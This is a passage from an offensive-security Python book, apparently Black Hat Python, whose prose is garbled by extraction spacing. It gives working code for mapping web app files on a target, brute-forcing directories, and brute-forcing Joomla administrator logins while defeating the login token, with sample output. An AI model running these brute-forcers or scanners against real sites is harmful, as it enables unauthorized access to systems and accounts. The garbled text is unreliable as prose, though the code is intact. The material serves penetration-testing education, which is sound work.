➋ cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
rects = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_
SCALE_IMAGE, (20,20))
if len(rects) == 0:
return False
rects[:, 2:] += rects[:, :2]
# highlight the faces in the image
➌ for x1,y1,x2,y2 in rects:
cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2)
➍ cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img)
return True
This c o de w as g enero usly s h are d b y C hris F id ao a t
http ://w ww.f id elo per.c o m /fa cia l- d ete ctio n/
w ith
slig ht m odific ati o ns b y y o urs tr u ly . U sin g th e O penC V P yth o n b in d in gs, w e c an r e ad i n th e i m age

and th en a p ply a c la ssifie r
➋ th at i s tr a in ed i n a d vance f o r d ete cti n g f a ces i n a f r o nt- fa cin g
orie nta ti o n. T here a re c la ssifie rs f o r p ro file ( s id ew ays) f a ce d ete cti o n, h and s, f r u it, a nd a w ho le h o st
of o th er o bje cts th at y o u c an tr y o ut f o r y o urs e lf. A fte r th e d ete cti o n h as b een r u n, i t w ill r e tu rn
re cta ngle c o ord in ate s th at c o rre sp ond to w here th e f a ce w as d ete cte d i n th e i m age. W e th en d ra w a n
actu al g re en r e cta ngle o ver th at a re a
➌ a nd w rite o ut th e r e su lti n g i m age
➍ . N ow l e t’ s ta ke th is a ll
fo r a s p in i n sid e y o ur K ali V M .

Kic k in g t h e T ir e s
If y o u h av en’t f ir s t i n sta lle d th e O penC V l ib ra rie s, r u n th e f o llo w in g c o m mand s ( a gain , th ank y o u,
Chris F id ao ) f r o m a te rm in al i n y o ur K ali V M :
#:>
apt-get install python-opencv python-numpy python-scipy
This s h o uld i n sta ll a ll o f th e n ecessa ry f ile s n eed ed to h and le f a cia l d ete cti o n o n o ur r e su lti n g i m ages.
We a ls o n eed to g ra b th e f a cia l d ete cti o n tr a in in g f ile l ik e s o :
wget http://eclecti.cc/files/2008/03/haarcascade_frontalface_alt.xml
Now c re ate a c o up le o f d ir e cto rie s f o r o ur o utp ut, d ro p i n a P C A P, a nd r u n th e s c rip t. T his s h o uld
lo ok s o m eth in g l ik e th is :
#:>
mkdir pictures
#:>
mkdir faces
#:>
python pic_carver.py
Extracted: 189 images
Detected: 32 faces
#:>
You m ig ht s e e a n um ber o f e rro r m essa ges b ein g p ro duced b y O penC V d ue to th e f a ct th at s o m e o f th e
im ages w e f e d i n to i t m ay b e c o rru p t o r p arti a lly d ow nlo ad ed o r th eir f o rm at m ig ht n o t b e s u p porte d .
(I’ ll l e av e b uild in g a r o bust i m age e xtr a cti o n a nd v alid ati o n r o uti n e a s a h o m ew ork a ssig nm ent f o r
yo u.) I f y o u c ra ck o pen y o ur f a ces d ir e cto ry , y o u s h o uld s e e a n um ber o f f ile s w ith f a ces a nd m agic
gre en b oxes d ra w n a ro und th em .
This te chniq ue c an b e u se d to d ete rm in e w hat ty p es o f c o nte nt y o ur ta rg et i s l o okin g a t, a s w ell a s to
dis c o ver l ik ely a p pro aches v ia s o cia l e ngin eerin g. Y ou c an o f c o urs e e xte nd th is e xam ple b eyo nd
usin g i t a gain st c arv ed i m ages f r o m P C A Ps a nd u se i t i n c o nju ncti o n w ith w eb c ra w lin g a nd p ars in g
te chniq ues d esc rib ed i n l a te r c hap te rs .
[ 8 ]
http ://w ww.s e cd ev.o rg /p ro je cts /s c a py/d oc/in sta lla tio n.h tm l# w in dow s
[ 9 ]
Check o ut O penC V h ere :
http ://w ww.o pen cv.o rg /
.

Chap te r 5 . W eb H ack ery
Analy zin g w eb a p plic ati o ns i s a b so lu te ly c riti c al f o r a n a tta cker o r p enetr a ti o n te ste r. I n m ost m odern
netw ork s, w eb a p plic ati o ns p re se nt th e l a rg est a tta ck s u rfa ce a nd s o a re a ls o th e m ost c o m mon
av enue f o r g ain in g a ccess. T here a re a n um ber o f e xcelle nt w eb a p plic ati o n to ols th at h av e b een
writte n i n P yth o n, i n clu d in g w 3af, s q lm ap , a nd o th ers . Q uite f r a nkly , to pic s s u ch a s S Q L i n je cti o n
hav e b een b eate n to d eath , a nd th e to olin g a v aila b le i s m atu re e no ugh th at w e d on’t n eed to r e in v ent
th e w heel. I n ste ad , w e’ll e xp lo re th e b asic s o f i n te ra cti n g w ith th e W eb u sin g P yth o n, a nd th en b uild
on th is k no w le d ge to c re ate r e co nnais sa nce a nd b ru te -fo rc e to olin g. Y ou’ll s e e h o w H TM L p ars in g
can b e u se fu l i n c re ati n g b ru te f o rc ers , r e co n to olin g, a nd m in in g te xt- h eav y s ite s. T he i d ea i s to
cre ate a f e w d iffe re nt to ols to g iv e y o u th e f u nd am enta l s k ills y o u n eed to b uild a ny ty p e o f w eb
ap plic ati o n a sse ssm ent to ol th at y o ur p arti c ula r a tta ck s c enario c alls f o r.

The S ock et L ib ra ry o f t h e W eb : u rllib 2
Much l ik e w riti n g n etw ork to olin g w ith th e s o cket l ib ra ry , w hen y o u’re c re ati n g to ols to i n te ra ct w ith
web s e rv ic es, y o u’ll u se th e
urllib2
l ib ra ry . L et’ s ta ke a l o ok a t m akin g a v ery s im ple G ET r e q uest
to th e N o S ta rc h P re ss w eb site :
import urllib2
➊ body = urllib2.urlopen("http://www.nostarch.com")
➋ print body.read()
This i s th e s im ple st e xam ple o f h o w to m ake a G ET r e q uest to a w eb site . B e m in d fu l th at w e a re j u st
fe tc hin g th e r a w p age f r o m th e N o S ta rc h w eb site , a nd th at n o J a v aS crip t o r o th er c lie nt- s id e
la nguages w ill e xecute . W e s im ply p ass i n a U RL to th e
urlopen
f u ncti o n
➊ a nd i t r e tu rn s a f ile -lik e
obje ct th at a llo w s u s to r e ad b ack
➋ th e b ody o f w hat th e r e m ote w eb s e rv er r e tu rn s. I n m ost c ase s,
ho w ev er, y o u a re g o in g to w ant m ore f in ely g ra in ed c o ntr o l o ver h o w y o u m ake th ese r e q uests ,
in clu d in g b ein g a b le to d efin e s p ecific h ead ers , h and le c o okie s, a nd c re ate P O ST r e q uests .
urllib2
exp ose s a
Request
c la ss th at g iv es y o u th is l e v el o f c o ntr o l. B elo w i s a n e xam ple o f h o w to c re ate
th e s a m e G ET r e q uest u sin g th e
Request
c la ss a nd d efin in g a c usto m U se r-A gent H TTP h ead er:
import urllib2
url = "http://www.nostarch.com"
➊ headers = {}
headers['User-Agent'] = "Googlebot"
➋ request = urllib2.Request(url,headers=headers)
➌ response = urllib2.urlopen(request)
print response.read()
response.close()
The c o nstr u cti o n o f a
Request
o bje ct i s s lig htl y d iffe re nt th an o ur p re v io us e xam ple . T o c re ate
custo m h ead ers , y o u d efin e a h ead ers d ic ti o nary
➊ , w hic h a llo w s y o u to th en s e t th e h ead er k ey a nd
valu e th at y o u w ant to u se . I n th is c ase , w e’re g o in g to m ake o ur P yth o n s c rip t a p pear to b e th e
Google b ot. W e th en c re ate o ur
Request
o bje ct a nd p ass i n th e
url
a nd th e
headers
d ic ti o nary
➋ ,
and th en p ass th e
Request
o bje ct to th e
urlopen
f u ncti o n c all
➌ . T his r e tu rn s a n o rm al f ile -lik e
obje ct th at w e c an u se to r e ad i n th e d ata f r o m th e r e m ote w eb site .
We n o w h av e th e f u nd am enta l m eans to ta lk to w eb s e rv ic es a nd w eb site s, s o l e t’ s c re ate s o m e u se fu l
to olin g f o r a ny w eb a p plic ati o n a tta ck o r p enetr a ti o n te st.

Map pin g O pen S ou rc e W eb A pp I n sta lla tio n s
Conte nt m anagem ent s y ste m s a nd b lo ggin g p la tf o rm s s u ch a s J o om la , W ord P re ss, a nd D ru p al m ake
sta rti n g a n ew b lo g o r w eb site s im ple , a nd th ey’re r e la ti v ely c o m mon i n a s h are d h o sti n g e nv ir o nm ent
or e v en a n e nte rp ris e n etw ork . A ll s y ste m s h av e th eir o w n c halle nges i n te rm s o f i n sta lla ti o n,
co nfig ura ti o n, a nd p atc h m anagem ent, a nd th ese C M S s u ite s a re n o e xcep ti o n. W hen a n o verw ork ed
sy sa d m in o r a h ap le ss w eb d ev elo per d oesn ’t f o llo w a ll s e curity a nd i n sta lla ti o n p ro ced ure s, i t c an
be e asy p ic kin gs f o r a n a tta cker to g ain a ccess to th e w eb s e rv er.
Because w e c an d ow nlo ad a ny o pen s o urc e w eb a p plic ati o n a nd l o cally d ete rm in e i ts f ile a nd
dir e cto ry s tr u ctu re , w e c an c re ate a p urp ose -b uilt s c anner th at c an h unt f o r a ll f ile s th at a re r e achab le
on th e r e m ote ta rg et. T his c an r o ot o ut l e fto ver i n sta lla ti o n f ile s, d ir e cto rie s th at s h o uld b e p ro te cte d
by
.htaccess
f ile s, a nd o th er g o odie s th at c an a ssis t a n a tta cker i n g etti n g a to eho ld o n th e w eb
se rv er. T his p ro je ct a ls o i n tr o duces y o u to u sin g P yth o n
Queue
o bje cts , w hic h a llo w u s to b uild a
la rg e, th re ad -s a fe s ta ck o f i te m s a nd h av e m ulti p le th re ad s p ic k i te m s f o r p ro cessin g. T his w ill a llo w
our s c anner to r u n v ery r a p id ly . L et’ s o pen
web _app_m apper.p y
a nd e nte r th e f o llo w in g c o de:
import Queue
import threading
import os
import urllib2
threads = 10
➊ target = "http://www.blackhatpython.com"
directory = "/Users/justin/Downloads/joomla-3.1.1"
filters = [".jpg",".gif","png",".css"]
os.chdir(directory)
➋ web_paths = Queue.Queue()
➌ for r,d,f in os.walk("."):
for files in f:
remote_path = "%s/%s" % (r,files)
if remote_path.startswith("."):
remote_path = remote_path[1:]
if os.path.splitext(files)[1] not in filters:
web_paths.put(remote_path)
def test_remote():
➍ while not web_paths.empty():
path = web_paths.get()
url = "%s%s" % (target, path)
request = urllib2.Request(url)
try:
response = urllib2.urlopen(request)
content = response.read()
➎ print "[%d] => %s" % (response.code,path)
response.close()
➏ except urllib2.HTTPError as error:
#print "Failed %s" % error.code
pass
➐ for i in range(threads):
print "Spawning thread: %d" % i
t = threading.Thread(target=test_remote)
t.start()

We b egin b y d efin in g th e r e m ote ta rg et w eb site
➊ a nd th e l o cal d ir e cto ry i n to w hic h w e h av e
dow nlo ad ed a nd e xtr a cte d th e w eb a p plic ati o n. W e a ls o c re ate a s im ple l is t o f f ile e xte nsio ns th at w e
are n o t i n te re ste d i n f in gerp rin ti n g. T his l is t c an b e d iffe re nt d ep end in g o n th e ta rg et a p plic ati o n. T he
web_paths
➋ v aria b le i s o ur
Queue
o bje ct w here w e w ill s to re th e f ile s th at w e’ll a tte m pt to l o cate
on th e r e m ote s e rv er. W e th en u se th e
os.walk
➌ f u ncti o n to w alk th ro ugh a ll o f th e f ile s a nd
dir e cto rie s i n th e l o cal w eb a p plic ati o n d ir e cto ry . A s w e w alk th ro ugh th e f ile s a nd d ir e cto rie s,
we’re b uild in g th e f u ll p ath to th e ta rg et f ile s a nd te sti n g th em a gain st o ur f ilte r l is t to m ake s u re w e
are o nly l o okin g f o r th e f ile ty p es w e w ant. F or e ach v alid f ile w e f in d l o cally , w e a d d i t to o ur
web_paths Queue
.
Lookin g a t th e b otto m o f th e s c rip t
➐ , w e a re c re ati n g a n um ber o f th re ad s ( a s s e t a t th e to p o f th e
file ) th at w ill e ach b e c alle d th e
test_remote
f u ncti o n. T he
test_remote
f u ncti o n o pera te s i n a
lo op th at w ill k eep e xecuti n g u nti l th e
web_paths Queue
i s e m pty . O n e ach i te ra ti o n o f th e l o op, w e
gra b a p ath f r o m th e
Queue
➍ , a d d i t to th e ta rg et w eb site ’s b ase p ath , a nd th en a tte m pt to r e tr ie v e i t.
If w e’re s u ccessfu l i n r e tr ie v in g th e f ile , w e o utp ut th e H TTP s ta tu s c o de a nd th e f u ll p ath to th e f ile
➎ . I f th e f ile i s n o t f o und o r i s p ro te cte d b y a n
.htaccess
f ile , th is w ill c ause
urllib2
to th ro w a n
erro r, w hic h w e h and le
➏ s o th e l o op c an c o nti n ue e xecuti n g.

Kic k in g t h e T ir e s
For te sti n g p urp ose s, I i n sta lle d J o om la 3 .1 .1 i n to m y K ali V M , b ut y o u c an u se a ny o pen s o urc e w eb
ap plic ati o n th at y o u c an q uic kly d ep lo y o r th at y o u h av e r u nnin g a lr e ad y. W hen y o u r u n
web _app_m apper.p y
, y o u s h o uld s e e o utp ut l ik e th e f o llo w in g:
Spawning thread: 0
Spawning thread: 1
Spawning thread: 2
Spawning thread: 3
Spawning thread: 4
Spawning thread: 5
Spawning thread: 6
Spawning thread: 7
Spawning thread: 8
Spawning thread: 9
[200] => /htaccess.txt
[200] => /web.config.txt
[200] => /LICENSE.txt
[200] => /README.txt
[200] => /administrator/cache/index.html
[200] => /administrator/components/index.html
[200] => /administrator/components/com_admin/controller.php
[200] => /administrator/components/com_admin/script.php
[200] => /administrator/components/com_admin/admin.xml
[200] => /administrator/components/com_admin/admin.php
[200] => /administrator/components/com_admin/helpers/index.html
[200] => /administrator/components/com_admin/controllers/index.html
[200] => /administrator/components/com_admin/index.html
[200] => /administrator/components/com_admin/helpers/html/index.html
[200] => /administrator/components/com_admin/models/index.html
[200] => /administrator/components/com_admin/models/profile.php
[200] => /administrator/components/com_admin/controllers/profile.php
You c an s e e th at w e a re p ic kin g u p s o m e v alid r e su lts i n clu d in g s o m e .
tx t
f ile s a nd X M L f ile s. O f
co urs e , y o u c an b uild a d diti o nal i n te llig ence i n to th e s c rip t to o nly r e tu rn f ile s y o u’re i n te re ste d i n —
su ch a s th o se w ith th e w ord
in sta ll
i n th em .

Bru te -F orc in g D ir e cto rie s a n d F ile L oca tio n s
The p re v io us e xam ple a ssu m ed a l o t o f k no w le d ge a b out y o ur ta rg et. B ut i n m any c ase s w here y o u’re
atta ckin g a c usto m w eb a p plic ati o n o r l a rg e e -c o m merc e s y ste m , y o u w on’t b e a w are o f a ll o f th e
file s a ccessib le o n th e w eb s e rv er. G enera lly , y o u’ll d ep lo y a s p id er, s u ch a s th e o ne i n clu d ed i n
Burp S uite , to c ra w l th e ta rg et w eb site i n o rd er to d is c o ver a s m uch o f th e w eb a p plic ati o n a s
possib le . H ow ev er, i n a l o t o f c ase s th ere a re c o nfig ura ti o n f ile s, l e fto ver d ev elo pm ent f ile s,
deb uggin g s c rip ts , a nd o th er s e curity b re ad cru m bs th at c an p ro vid e s e nsiti v e i n fo rm ati o n o r e xp ose
fu ncti o nality th at th e s o ftw are d ev elo per d id n o t i n te nd . T he o nly w ay to d is c o ver th is c o nte nt i s to
use a b ru te -fo rc in g to ol to h unt d ow n c o m mon f ile nam es a nd d ir e cto rie s.
We’ll b uild a s im ple to ol th at w ill a ccep t w ord lis ts f r o m c o m mon b ru te f o rc ers s u ch a s th e D ir B uste r
pro je ct
[ 10
]
o r S V N Dig ger,
[ 11
]
a nd a tte m pt to d is c o ver d ir e cto rie s a nd f ile s th at a re r e achab le o n th e
ta rg et w eb s e rv er. A s b efo re , w e’ll c re ate a p ool o f th re ad s to a ggre ssiv ely a tte m pt to d is c o ver
co nte nt. L et’ s s ta rt b y c re ati n g s o m e f u ncti o nality to c re ate a
Queue
o ut o f a w ord lis t f ile . O pen u p a
new f ile , n am e i t
co nte n t_ bru te r.p y
, a nd e nte r th e f o llo w in g c o de:
import urllib2
import threading
import Queue
import urllib
threads = 50
target_url = "http://testphp.vulnweb.com"
wordlist_file = "/tmp/all.txt" # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101
Firefox/19.0"
def build_wordlist(wordlist_file):
# read in the word list
➊ fd = open(wordlist_file,"rb")
raw_words = fd.readlines()
fd.close()
found_resume = False
words = Queue.Queue()
➋ for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words
This h elp er f u ncti o n i s p re tty s tr a ig htf o rw ard . W e r e ad i n a w ord lis t f ile
➊ a nd th en b egin i te ra ti n g
over e ach l in e i n th e f ile
➋ . W e h av e s o m e b uilt- in f u ncti o nality th at a llo w s u s to r e su m e a b ru te -
fo rc in g s e ssio n i f o ur n etw ork c o nnecti v ity i s i n te rru p te d o r th e ta rg et s ite g o es d ow n. T his c an b e
achie v ed b y s im ply s e tti n g th e
resume
v aria b le to th e l a st p ath th at th e b ru te f o rc er tr ie d . W hen th e

enti r e f ile h as b een p ars e d , w e r e tu rn a
Queue
f u ll o f w ord s to u se i n o ur a ctu al b ru te -fo rc in g
fu ncti o n. W e w ill r e use th is f u ncti o n l a te r i n th is c hap te r.
We w ant s o m e b asic f u ncti o nality to b e a v aila b le to o ur b ru te -fo rc in g s c rip t. T he f ir s t i s th e a b ility to
ap ply a l is t o f e xte nsio ns to te st f o r w hen m akin g r e q uests . I n s o m e c ase s, y o u w ant to tr y n o t o nly th e
/a dm in
d ir e ctl y f o r e xam ple , b ut
adm in .p hp
,
adm in .i n c
, a nd
adm in .h tm l
.
def dir_bruter(word_queue,extensions=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
# check to see if there is a file extension; if not,
# it's a directory path we're bruting
➊ if "." not in attempt:
attempt_list.append("/%s/" % attempt)
else:
attempt_list.append("/%s" % attempt)
# if we want to bruteforce extensions
➋ if extensions:
for extension in extensions:
attempt_list.append("/%s%s" % (attempt,extension))
# iterate over our list of attempts
for brute in attempt_list:
url = "%s%s" % (target_url,urllib.quote(brute))
try:
headers = {}
➌ headers["User-Agent"] = user_agent
r = urllib2.Request(url,headers=headers)
response = urllib2.urlopen(r)
➍ if len(response.read()):
print "[%d] => %s" % (response.code,url)
except urllib2.URLError,e:
if hasattr(e, 'code') and e.code != 404:
➎ print "!!! %d => %s" % (e.code,url)
pass
Our
dir_bruter
f u ncti o n a ccep ts a
Queue
o bje ct th at i s p opula te d w ith w ord s to u se f o r b ru te -
fo rc in g a nd a n o pti o nal l is t o f f ile e xte nsio ns to te st. W e b egin b y te sti n g to s e e i f th ere i s a f ile
exte nsio n i n th e c urre nt w ord
➊ , a nd i f th ere i s n ’t, w e tr e at i t a s a d ir e cto ry th at w e w ant to te st f o r
on th e r e m ote w eb s e rv er. I f th ere i s a l is t o f f ile e xte nsio ns p asse d i n
➋ , th en w e ta ke th e c urre nt
word a nd a p ply e ach f ile e xte nsio n th at w e w ant to te st f o r.
It c an b e u se fu l h ere to th in k o f u sin g
exte nsio ns l ik e
.o rig
a nd
.b ak
o n to p o f th e r e gula r p ro gra m min g l a nguage e xte nsio ns. A fte r w e b uild
a l is t o f b ru te -fo rc in g a tte m pts , w e s e t th e U se r-A gent h ead er to s o m eth in g i n no cuo us
➌ a nd te st th e
re m ote w eb s e rv er. I f th e r e sp onse c o de i s a 2 00, w e o utp ut th e U RL
➍ , a nd i f w e r e ceiv e a nyth in g
but a 4 04 w e a ls o o utp ut i t
➎ b ecause th is c o uld i n d ic ate s o m eth in g i n te re sti n g o n th e r e m ote w eb
se rv er a sid e f r o m a “ file n o t f o und ” e rro r.
It’ s u se fu l to p ay a tte nti o n to a nd r e act to y o ur o utp ut b ecause , d ep end in g o n th e c o nfig ura ti o n o f th e
re m ote w eb s e rv er, y o u m ay h av e to f ilte r o ut m ore H TTP e rro r c o des i n o rd er to c le an u p y o ur

re su lts . L et’ s f in is h o ut th e s c rip t b y s e tti n g u p o ur w ord lis t, c re ati n g a l is t o f e xte nsio ns, a nd s p in nin g
up th e b ru te -fo rc in g th re ad s.
word_queue = build_wordlist(wordlist_file)
extensions = [".php",".bak",".orig",".inc"]
for i in range(threads):
t = threading.Thread(target=dir_bruter,args=(word_queue,extensions,))
t.start()
The c o de s n ip a b ove i s p re tty s tr a ig htf o rw ard a nd s h o uld l o ok f a m ilia r b y n o w . W e g et o ur l is t o f
word s to b ru te -fo rc e, c re ate a s im ple l is t o f f ile e xte nsio ns to te st f o r, a nd th en s p in u p a b unch o f
th re ad s to d o th e b ru te -fo rc in g.

Kic k in g t h e T ir e s
OW ASP h as a l is t o f o nlin e a nd o fflin e ( v ir tu al m achin es, I S O s, e tc .) v uln era b le w eb a p plic ati o ns
th at y o u c an te st y o ur to olin g a gain st. I n th is c ase , th e U RL th at i s r e fe re nced i n th e s o urc e c o de p oin ts
to a n i n te nti o nally b uggy w eb a p plic ati o n h o ste d b y A cuneti x . T he c o ol th in g i s th at i t s h o w s y o u h o w
effe cti v e b ru te -fo rc in g a w eb a p plic ati o n c an b e. I r e co m mend y o u s e t th e
thread_count
v aria b le to
so m eth in g s a ne s u ch a s
5 a nd r u n th e s c rip t. I n s h o rt o rd er, y o u s h o uld s ta rt s e ein g r e su lts s u ch a s th e
ones b elo w :
[200] => http://testphp.vulnweb.com/CVS/
[200] => http://testphp.vulnweb.com/admin/
[200] => http://testphp.vulnweb.com/index.bak
[200] => http://testphp.vulnweb.com/search.php
[200] => http://testphp.vulnweb.com/login.php
[200] => http://testphp.vulnweb.com/images/
[200] => http://testphp.vulnweb.com/index.php
[200] => http://testphp.vulnweb.com/logout.php
[200] => http://testphp.vulnweb.com/categories.php
You c an s e e th at w e a re p ullin g s o m e i n te re sti n g r e su lts f r o m th e r e m ote w eb site . I c anno t s tr e ss
eno ugh th e i m porta nce to p erfo rm c o nte nt b ru te -fo rc in g a gain st a ll o f y o ur w eb a p plic ati o n ta rg ets .

Bru te -F orc in g H TM L F orm A uth en tic a tio n
There m ay c o m e a ti m e i n y o ur w eb h ackin g c are er w here y o u n eed to e ith er g ain a ccess to a ta rg et,
or i f y o u’re c o nsu lti n g, y o u m ig ht n eed to a sse ss th e p assw ord s tr e ngth o n a n e xis ti n g w eb s y ste m . I t
has b eco m e m ore a nd m ore c o m mon f o r w eb s y ste m s to h av e b ru te -fo rc e p ro te cti o n, w heth er a
cap tc ha, a s im ple m ath e q uati o n, o r a l o gin to ken th at h as to b e s u b m itte d w ith th e r e q uest. T here a re a
num ber o f b ru te f o rc ers th at c an d o th e b ru te -fo rc in g o f a P O ST r e q uest to th e l o gin s c rip t, b ut i n a l o t
of c ase s th ey a re n o t f le xib le e no ugh to d eal w ith d ynam ic c o nte nt o r h and le s im ple “ are y o u h um an”
checks. W e’ll c re ate a s im ple b ru te f o rc er th at w ill b e u se fu l a gain st J o om la , a p opula r c o nte nt
managem ent s y ste m . M odern J o om la s y ste m s i n clu d e s o m e b asic a nti - b ru te -fo rc e te chniq ues, b ut s ti ll
la ck a cco unt l o cko uts o r s tr o ng c ap tc has b y d efa ult.
In o rd er to b ru te -fo rc e J o om la , w e h av e tw o r e q uir e m ents th at n eed to b e m et: r e tr ie v e th e l o gin to ken
fr o m th e l o gin f o rm b efo re s u b m itti n g th e p assw ord a tte m pt a nd e nsu re th at w e a ccep t c o okie s i n o ur
urllib2
s e ssio n. I n o rd er to p ars e o ut th e l o gin f o rm v alu es, w e’ll u se th e n ati v e P yth o n c la ss
HTMLParser
. T his w ill a ls o b e a g o od w hir lw in d to ur o f s o m e a d diti o nal f e atu re s o f
urllib2
th at
yo u c an e m plo y w hen b uild in g to olin g f o r y o ur o w n ta rg ets . L et’ s g et s ta rte d b y h av in g a l o ok a t th e
Jo om la a d m in is tr a to r l o gin f o rm . T his c an b e f o und b y b ro w sin g to
http ://< yo urta rg et> .c o m /a dm in is tr a to r/
. F or th e s a ke o f b re v ity , I ’ v e o nly i n clu d ed th e r e le v ant
fo rm e le m ents .
class="form-inline">
class="input-medium" placeholder="User Name" size="15"/>
class="input-medium" placeholder="Password" size="15"/>






Read in g th ro ugh th is f o rm , w e a re p riv y to s o m e v alu ab le i n fo rm ati o n th at w e’ll n eed to i n co rp ora te
in to o ur b ru te f o rc er. T he f ir s t i s th at th e f o rm g ets s u b m itte d to th e
/administrator/index.php
path a s a n H TTP P O ST. T he n ext a re a ll o f th e f ie ld s r e q uir e d i n o rd er f o r th e f o rm s u b m is sio n to b e
su ccessfu l. I n p arti c ula r, i f y o u l o ok a t th e l a st h id den f ie ld ,
yo u’ll s e e th at i ts n am e a ttr ib ute i s s e t to a
lo ng, r a nd om iz e d s tr in g. T his i s th e e sse nti a l p ie ce o f J o om la ’s a nti - b ru te -fo rc in g te chniq ue. T hat
ra nd om iz e d s tr in g i s c hecked a gain st y o ur c urre nt u se r s e ssio n, s to re d i n a c o okie , a nd e v en i f y o u a re
passin g th e c o rre ct c re d enti a ls i n to th e l o gin p ro cessin g s c rip t, i f th e r a nd om iz e d to ken i s n o t p re se nt,
th e a uth enti c ati o n w ill f a il. T his m eans w e h av e to u se th e f o llo w in g r e q uest f lo w i n o ur b ru te f o rc er
in o rd er to b e s u ccessfu l a gain st J o om la :
1 .
Retr ie v e th e l o gin p age, a nd a ccep t a ll c o okie s th at a re r e tu rn ed .
2 .
Pars e o ut a ll o f th e f o rm e le m ents f r o m th e H TM L.
3 .
Set th e u se rn am e a nd /o r p assw ord to a g uess f r o m o ur d ic ti o nary .

4 .
Send a n H TTP P O ST to th e l o gin p ro cessin g s c rip t i n clu d in g a ll H TM L f o rm f ie ld s a nd o ur
sto re d c o okie s.
5 .
Test to s e e i f w e h av e s u ccessfu lly l o gged i n to th e w eb a p plic ati o n.
You c an s e e th at w e a re g o in g to b e u ti liz in g s o m e n ew a nd v alu ab le te chniq ues i n th is s c rip t. I w ill
als o m enti o n th at y o u s h o uld n ev er “ tr a in ” y o ur to olin g o n a l iv e ta rg et; a lw ays s e t u p a n i n sta lla ti o n
of y o ur ta rg et w eb a p plic ati o n w ith k no w n c re d enti a ls a nd v erify th at y o u g et th e d esir e d r e su lts .
Let’ s o pen a n ew P yth o n f ile n am ed
jo om la _kille r.p y
a nd e nte r th e f o llo w in g c o de:
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
# general settings
user_thread = 10
username = "admin"
wordlist_file = "/tmp/cain.txt"
resume = None
# target specific settings
➊ target_url = "http://192.168.112.131/administrator/index.php"
target_post = "http://192.168.112.131/administrator/index.php"
➋ username_field= "username"
password_field= "passwd"
➌ success_check = "Administration - Control Panel"
These g enera l s e tti n gs d ese rv e a b it o f e xp la nati o n. T he
target_url
v aria b le
➊ i s w here o ur s c rip t
will f ir s t d ow nlo ad a nd p ars e th e H TM L. T he
target_post
v aria b le i s w here w e w ill s u b m it o ur
bru te -fo rc in g a tte m pt. B ase d o n o ur b rie f a naly sis o f th e H TM L i n th e J o om la l o gin , w e c an s e t
th e
username_field
a nd
password_field
➋ v aria b le s to th e a p pro pria te n am e o f th e H TM L e le m ents .
Our
success_check
v aria b le
➌ i s a s tr in g th at w e’ll c heck f o r a fte r e ach b ru te -fo rc in g a tte m pt i n
ord er to d ete rm in e w heth er w e a re s u ccessfu l o r n o t. L et’ s n o w c re ate th e p lu m bin g f o r o ur b ru te
fo rc er; s o m e o f th e f o llo w in g c o de w ill b e f a m ilia r s o I ’ ll o nly h ig hlig ht th e n ew est te chniq ues.
class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False
print "Finished setting up for: %s" % username
def run_bruteforce(self):
for i in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
➊ jar = cookielib.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

response = opener.open(target_url)
page = response.read()
print "Trying: %s : %s (%d left)" % (self.username,brute,self.
password_q.qsize())
# parse out the hidden fields
➋ parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add our username and password fields
➌ post_tags[username_field] = self.username
post_tags[password_field] = brute
➍ login_data = urllib.urlencode(post_tags)
login_response = opener.open(target_post, login_data)
login_result = login_response.read()
➎ if success_check in login_result:
self.found = True
print "[*] Bruteforce successful."
print "[*] Username: %s" % username
print "[*] Password: %s" % brute
print "[*] Waiting for other threads to exit..."
This i s o ur p rim ary b ru te -fo rc in g c la ss, w hic h w ill h and le a ll o f th e H TTP r e q uests a nd m anage
co okie s f o r u s. A fte r w e g ra b o ur p assw ord a tte m pt, w e s e t u p o ur c o okie j a r
➊ u sin g th e
FileCookieJar
c la ss th at w ill s to re th e c o okie s i n th e
co okie s
f ile . N ext w e i n iti a liz e o ur
urllib2
opener, p assin g i n th e i n iti a liz e d c o okie j a r, w hic h te lls
urllib2
to p ass o ff a ny c o okie s to i t. W e
th en m ake th e i n iti a l r e q uest to r e tr ie v e th e l o gin f o rm . W hen w e h av e th e r a w H TM L, w e p ass i t o ff
to o ur H TM L p ars e r a nd c all i ts
feed
m eth o d
➋ , w hic h r e tu rn s a d ic ti o nary o f a ll o f th e r e tr ie v ed
fo rm e le m ents . A fte r w e h av e s u ccessfu lly p ars e d th e H TM L, w e r e p la ce th e u se rn am e a nd p assw ord
fie ld s w ith o ur b ru te -fo rc in g a tte m pt
➌ . N ext w e U RL e nco de th e P O ST v aria b le s
➍ , a nd th en p ass
th em i n o ur s u b se q uent H TTP r e q uest. A fte r w e r e tr ie v e th e r e su lt o f o ur a uth enti c ati o n a tte m pt, w e
te st w heth er th e a uth enti c ati o n w as s u ccessfu l o r n o t
➎ . N ow l e t’ s i m ple m ent th e c o re o f o ur H TM L
pro cessin g. A dd th e f o llo w in g c la ss to y o ur
jo om la _kille r.p y
s c rip t:
class BruteParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
➊ self.tag_results = {}
def handle_starttag(self, tag, attrs):
➋ if tag == "input":
tag_name = None
tag_value = None
for name,value in attrs:
if name == "name":
➌ tag_name = value
if name == "value":
➍ tag_value = value
if tag_name is not None:
➎ self.tag_results[tag_name] = value
This f o rm s th e s p ecific H TM L p ars in g c la ss th at w e w ant to u se a gain st o ur ta rg et. A fte r y o u h av e th e
basic s o f u sin g th e
HTMLParser
c la ss, y o u c an a d ap t i t to e xtr a ct i n fo rm ati o n f r o m a ny w eb
